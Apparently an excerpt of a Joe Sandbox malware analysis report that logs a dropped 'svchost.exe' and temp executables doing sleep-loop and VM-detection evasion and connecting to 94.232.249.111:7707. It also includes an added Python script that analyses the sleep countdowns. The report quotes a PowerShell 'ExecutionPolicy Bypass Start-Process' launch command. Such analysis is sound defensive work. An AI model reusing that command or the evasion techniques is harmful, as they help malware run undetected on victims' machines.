                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe TID: 6044 | Thread sleep time: -598233s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe TID: 6044 | Thread sleep time: -598112s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe TID: 6044 | Thread sleep time: -597993s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe TID: 6044 | Thread sleep time: -597875s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe TID: 6044 | Thread sleep time: -597766s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe TID: 6044 | Thread sleep time: -597641s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe TID: 6044 | Thread sleep time: -597530s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe TID: 6044 | Thread sleep time: -597410s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe TID: 6044 | Thread sleep time: -597282s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe TID: 6044 | Thread sleep time: -597172s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe TID: 6044 | Thread sleep time: -597063s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe TID: 6044 | Thread sleep time: -596938s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe TID: 6044 | Thread sleep time: -596813s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe TID: 6044 | Thread sleep time: -596688s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe TID: 6044 | Thread sleep time: -596563s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe TID: 6044 | Thread sleep time: -596437s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe TID: 6044 | Thread sleep time: -596328s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe TID: 6044 | Thread sleep time: -596219s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe TID: 6044 | Thread sleep time: -596110s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe TID: 6044 | Thread sleep time: -595985s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe TID: 6044 | Thread sleep time: -595860s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe TID: 6044 | Thread sleep time: -595735s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe TID: 6044 | Thread sleep time: -595610s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe TID: 6044 | Thread sleep time: -595485s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe TID: 6044 | Thread sleep time: -595360s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe TID: 6044 | Thread sleep time: -595235s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe TID: 6044 | Thread sleep time: -595110s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe TID: 6044 | Thread sleep time: -594985s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe TID: 6044 | Thread sleep time: -594860s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe TID: 6044 | Thread sleep time: -594719s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe TID: 6044 | Thread sleep time: -594610s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe TID: 6044 | Thread sleep time: -594485s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe TID: 6044 | Thread sleep time: -594351s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe TID: 6044 | Thread sleep time: -594235s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe TID: 6044 | Thread sleep time: -594110s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe TID: 6044 | Thread sleep time: -593985s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe TID: 6044 | Thread sleep time: -593860s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe TID: 6044 | Thread sleep time: -593735s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5852 | Thread sleep time: -1844674407370954s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2676 | Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe TID: 1876 | Thread sleep time: -33204139332677172s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe TID: 1876 | Thread sleep time: -600000s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe TID: 1876 | Thread sleep time: -599874s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe TID: 1876 | Thread sleep time: -599765s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe TID: 1876 | Thread sleep time: -599656s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe TID: 1876 | Thread sleep time: -599546s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe TID: 1876 | Thread sleep time: -599437s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe TID: 1876 | Thread sleep time: -599325s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe TID: 1876 | Thread sleep time: -599218s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe TID: 1876 | Thread sleep time: -599109s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe TID: 1876 | Thread sleep time: -598999s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe TID: 1876 | Thread sleep time: -598890s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe TID: 1876 | Thread sleep time: -598780s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe TID: 1876 | Thread sleep time: -598671s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe TID: 1876 | Thread sleep time: -598562s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe TID: 1876 | Thread sleep time: -598453s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe TID: 1876 | Thread sleep time: -598343s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe TID: 1876 | Thread sleep time: -598233s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe TID: 1876 | Thread sleep time: -598114s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe TID: 1876 | Thread sleep time: -597984s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe TID: 1876 | Thread sleep time: -597874s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe TID: 1876 | Thread sleep time: -597765s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe TID: 1876 | Thread sleep time: -597655s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe TID: 1876 | Thread sleep time: -597546s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe TID: 1876 | Thread sleep time: -200000s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe TID: 1876 | Thread sleep time: -99864s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe TID: 1876 | Thread sleep time: -99735s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe TID: 1876 | Thread sleep time: -99610s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe TID: 1876 | Thread sleep time: -99485s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe TID: 1876 | Thread sleep time: -99360s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe TID: 1876 | Thread sleep time: -99237s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe TID: 1876 | Thread sleep time: -99110s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe TID: 1876 | Thread sleep time: -98985s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe TID: 1876 | Thread sleep time: -98860s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe TID: 1876 | Thread sleep time: -98735s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe TID: 1876 | Thread sleep time: -98610s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe TID: 1876 | Thread sleep time: -98485s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe TID: 1876 | Thread sleep time: -98360s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe TID: 1876 | Thread sleep time: -98235s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe TID: 1876 | Thread sleep time: -595625s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe TID: 1876 | Thread sleep time: -595515s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe TID: 1876 | Thread sleep time: -595406s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe TID: 1876 | Thread sleep time: -595296s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe TID: 1876 | Thread sleep time: -595187s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe TID: 1876 | Thread sleep time: -595077s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe TID: 1876 | Thread sleep time: -594968s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe TID: 1876 | Thread sleep time: -594859s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe TID: 1876 | Thread sleep time: -594749s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select ProcessorId From Win32_processor
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exe | File Volume queried: C:\ FullSizeInformation
                    Source: C:\Users\user\AppData\Roaming\svchost.exe | File Volume queried: C:\ FullSizeInformation
                    Source: C:\Users\user\AppData\Roaming\svchost.exe | File Volume queried: C:\ FullSizeInformation
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe | File Volume queried: C:\ FullSizeInformation
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe | File Volume queried: C:\ FullSizeInformation
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\svchost.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\svchost.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe | Thread delayed: delay time: 600000
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe | Thread delayed: delay time: 599891
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe | Thread delayed: delay time: 599782
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe | Thread delayed: delay time: 599657
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe | Thread delayed: delay time: 599516
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe | Thread delayed: delay time: 599391
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe | Thread delayed: delay time: 599266
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe | Thread delayed: delay time: 599132
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe | Thread delayed: delay time: 598986
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe | Thread delayed: delay time: 598797
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe | Thread delayed: delay time: 598684
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe | Thread delayed: delay time: 598578
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe | Thread delayed: delay time: 598469
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe | Thread delayed: delay time: 598344
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe | Thread delayed: delay time: 598233
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe | Thread delayed: delay time: 598112
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe | Thread delayed: delay time: 597993
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe | Thread delayed: delay time: 597875
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe | Thread delayed: delay time: 597766
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe | Thread delayed: delay time: 597641
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe | Thread delayed: delay time: 597530
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe | Thread delayed: delay time: 597410
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe | Thread delayed: delay time: 597282
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe | Thread delayed: delay time: 597172
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe | Thread delayed: delay time: 597063
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe | Thread delayed: delay time: 596938
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe | Thread delayed: delay time: 596813
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe | Thread delayed: delay time: 596688
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe | Thread delayed: delay time: 596563
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe | Thread delayed: delay time: 596437
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe | Thread delayed: delay time: 596328
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe | Thread delayed: delay time: 596219
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe | Thread delayed: delay time: 596110
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe | Thread delayed: delay time: 595985
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe | Thread delayed: delay time: 595860
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe | Thread delayed: delay time: 595735
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe | Thread delayed: delay time: 595610
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe | Thread delayed: delay time: 595485
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe | Thread delayed: delay time: 595360
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe | Thread delayed: delay time: 595235
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe | Thread delayed: delay time: 595110
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe | Thread delayed: delay time: 594985
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe | Thread delayed: delay time: 594860
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe | Thread delayed: delay time: 594719
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe | Thread delayed: delay time: 594610
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe | Thread delayed: delay time: 594485
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe | Thread delayed: delay time: 594351
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe | Thread delayed: delay time: 594235
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe | Thread delayed: delay time: 594110
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe | Thread delayed: delay time: 593985
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe | Thread delayed: delay time: 593860
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exe | Thread delayed: delay time: 593735
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe | Thread delayed: delay time: 600000
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe | Thread delayed: delay time: 599874
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe | Thread delayed: delay time: 599765
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe | Thread delayed: delay time: 599656
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe | Thread delayed: delay time: 599546
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe | Thread delayed: delay time: 599437
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe | Thread delayed: delay time: 599325
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe | Thread delayed: delay time: 599218
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe | Thread delayed: delay time: 599109
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe | Thread delayed: delay time: 598999
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe | Thread delayed: delay time: 598890
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe | Thread delayed: delay time: 598780
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe | Thread delayed: delay time: 598671
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe | Thread delayed: delay time: 598562
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe | Thread delayed: delay time: 598453
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe | Thread delayed: delay time: 598343
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe | Thread delayed: delay time: 598233
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe | Thread delayed: delay time: 598114
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe | Thread delayed: delay time: 597984
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe | Thread delayed: delay time: 597874
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe | Thread delayed: delay time: 597765
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe | Thread delayed: delay time: 597655
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe | Thread delayed: delay time: 597546
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe | Thread delayed: delay time: 100000
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe | Thread delayed: delay time: 99864
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe | Thread delayed: delay time: 99735
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe | Thread delayed: delay time: 99610
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe | Thread delayed: delay time: 99485
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe | Thread delayed: delay time: 99360
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe | Thread delayed: delay time: 99237
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe | Thread delayed: delay time: 99110
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe | Thread delayed: delay time: 98985
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe | Thread delayed: delay time: 98860
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe | Thread delayed: delay time: 98735
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe | Thread delayed: delay time: 98610
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe | Thread delayed: delay time: 98485
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe | Thread delayed: delay time: 98360
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe | Thread delayed: delay time: 98235
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe | Thread delayed: delay time: 595625
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeThread delayed: delay time: 595515
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeThread delayed: delay time: 595406
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeThread delayed: delay time: 595296
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeThread delayed: delay time: 595187
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeThread delayed: delay time: 595077
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeThread delayed: delay time: 594968
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeThread delayed: delay time: 594859
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeThread delayed: delay time: 594749
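The delay values above are not independent sleeps. Within each block they shrink by roughly 110 ms (or 125 ms) per call, which is the signature of a loop that recomputes the time left until a fixed deadline and sleeps again: the sandbox cut each Sleep short, the sample noticed and re-armed with the remainder. Shortening individual Sleep calls therefore only makes such a loop spin; the wait ends when the clock says so, so the clock itself has to be accelerated. The Python below is an added example, not part of the Joe Sandbox report or of the sample. It embeds the 46 values from the report as constructed input, splits them into countdown runs and reports what each run implies. The 1000 ms step threshold, the three-call minimum and the reading of start minus end as elapsed wall clock are the example's own assumptions.

```python
from typing import Dict, List

# The 46 "Thread delayed: delay time" values listed in the report, in order (ms).
# Embedded here as constructed input so the example runs offline.
DELAYS_MS = [
    599874, 599765, 599656, 599546, 599437, 599325, 599218, 599109, 598999, 598890,
    598780, 598671, 598562, 598453, 598343, 598233, 598114, 597984, 597874, 597765,
    597655, 597546,
    100000, 99864, 99735, 99610, 99485, 99360, 99237, 99110, 98985, 98860,
    98735, 98610, 98485, 98360, 98235,
    595625, 595515, 595406, 595296, 595187, 595077, 594968, 594859, 594749,
]


def _summarise(run: List[int]) -> Dict[str, int]:
    """Describe one countdown run: first/last request, call count, and the
    wall-clock time it consumed (assumption: each request is 'time left to a
    deadline', so start minus end is the time that really elapsed)."""
    steps = [a - b for a, b in zip(run, run[1:])]
    return {
        "start_ms": run[0],
        "end_ms": run[-1],
        "calls": len(run),
        "elapsed_ms": run[0] - run[-1],
        "mean_step_ms": round(sum(steps) / len(steps)) if steps else 0,
    }


def split_countdown_runs(delays: List[int], max_step_ms: int = 1000) -> List[Dict[str, int]]:
    """Group consecutive delay requests into countdown runs.

    A new run starts whenever the requested delay grows, or shrinks by more than
    max_step_ms (assumed threshold): a remaining-time loop re-arms with a value
    only slightly smaller than the previous one, never with a larger one.
    """
    if not delays:
        return []
    runs: List[List[int]] = [[delays[0]]]
    for prev, cur in zip(delays, delays[1:]):
        if 0 < prev - cur <= max_step_ms:
            runs[-1].append(cur)
        else:
            runs.append([cur])
    return [_summarise(run) for run in runs]


def is_sleep_loop(run: Dict[str, int], min_calls: int = 3) -> bool:
    """Three or more re-armed calls in one run: the code is tracking a deadline,
    so per-call sleep shortening will not collapse the wait."""
    return run["calls"] >= min_calls


def intended_wait_seconds(runs: List[Dict[str, int]]) -> int:
    """Longest deadline the sample set, taken from the first request of each run."""
    return round(max(r["start_ms"] for r in runs) / 1000)


if __name__ == "__main__":
    summaries = split_countdown_runs(DELAYS_MS)
    for s in summaries:
        flag = "deadline loop" if is_sleep_loop(s) else "single sleep"
        print(f"{s['start_ms']:>7} -> {s['end_ms']:>7} ms  calls={s['calls']:<3} "
              f"step~{s['mean_step_ms']} ms  elapsed~{s['elapsed_ms']} ms  [{flag}]")
    print(f"intended wait: about {intended_wait_seconds(summaries)} s")
```

On the report's values this yields three runs: 22 calls from 599874 down to 597546, 15 calls from 100000 down to 98235, and 9 calls from 595625 down to 594749, all flagged as deadline loops, with an intended wait of about 600 s. The 100 s run sits between two pieces of the same 600 s countdown, and the gap between them (597546 to 595625, about 1.9 s) is close to the 100 s run's own elapsed time, which is consistent with a second, shorter timer running on another thread; the report does not identify threads, so the example treats runs independently.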
Source: svchost.exe.0.dr | Binary or memory string: vmware
Source: svchost.exe, 00000007.00000002.2933868519.0000000006C50000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: zrrHgsDzgS.exe, 00000000.00000002.1725153654.0000000000C58000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: svchost.exe, 00000007.00000002.2930700554.0000000005BAE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}t
Source: luglzv.exe.7.dr | Binary or memory string: VMwareVBox
Source: udwnme.exe, 0000000F.00000002.2932225102.0000000005420000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllpping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program Files (x86)ProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyP
Source: svchost.exe, 00000007.00000002.2930537569.0000000005B8E000.00000004.00000020.00020000.00000000.sdmp, luglzv.exe, 0000001C.00000002.2933769368.0000000004FC0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\zrrHgsDzgS.exe | Process information queried: ProcessInformation
Source: C:\Users\user\AppData\Local\Temp\udwnme.exe | Code function: 15_2_05400B20 LdrInitializeThunk,15_2_05400B20
Source: C:\Users\user\Desktop\zrrHgsDzgS.exe | Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\udwnme.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\luglzv.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\zrrHgsDzgS.exe | Memory allocated: page read and write | page guard

                    HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\AppData\Roaming\svchost.exe | Network Connect: 94.232.249.111 7707
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\udwnme.exe"'
